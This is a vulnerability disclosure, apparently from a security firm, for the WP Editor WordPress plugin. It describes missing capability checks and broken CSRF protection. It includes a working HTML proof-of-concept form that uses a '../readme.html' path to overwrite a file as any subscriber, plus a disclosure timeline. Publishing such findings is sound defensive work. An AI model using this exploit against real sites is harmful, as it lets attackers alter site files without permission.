As discussed in the more detail in the post for the other vulnerability we found in the WP Editor plugin, we recently started seeing requests for a file in this plugin on one of our websites and we believe that it was checking for use of the plugin before exploiting it. After seeing that we started checking for vulnerabilities.
In addition the vulnerability we discussed in the other we post, we also found that any logged in user can edit files on the website since there is no check as to the user capabilities when editing the files. The protection against cross-site request forgery (CSRF) is broken, so it is also susceptible to that.
Proof of Concept
The following proof of concept will cause the readme.html in the root directory of the WordPress installation to be edited to say “File edited.”, when logged in as a subscriber level or higher user.
Make sure to replace “[path to WordPress]” with the location of WordPress:
<html> <head> </head> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="post"> <input type="hidden" name="action" value="save_files" /> <input type="hidden" name="real_file" value="../readme.html" /> <input type="hidden" name="new_content" value="File edited." /> <input type="hidden" name="_success" value="The file has been updated successfully." /> <input type="submit" value="Submit" /> </form> </body> </html>
5/11/2016- WordPress.org Plugin Directory notified.
5/12/2016 – Developer notified.
5/13/2016 – Version 1.2.6 released, which fixes vulnerabilities.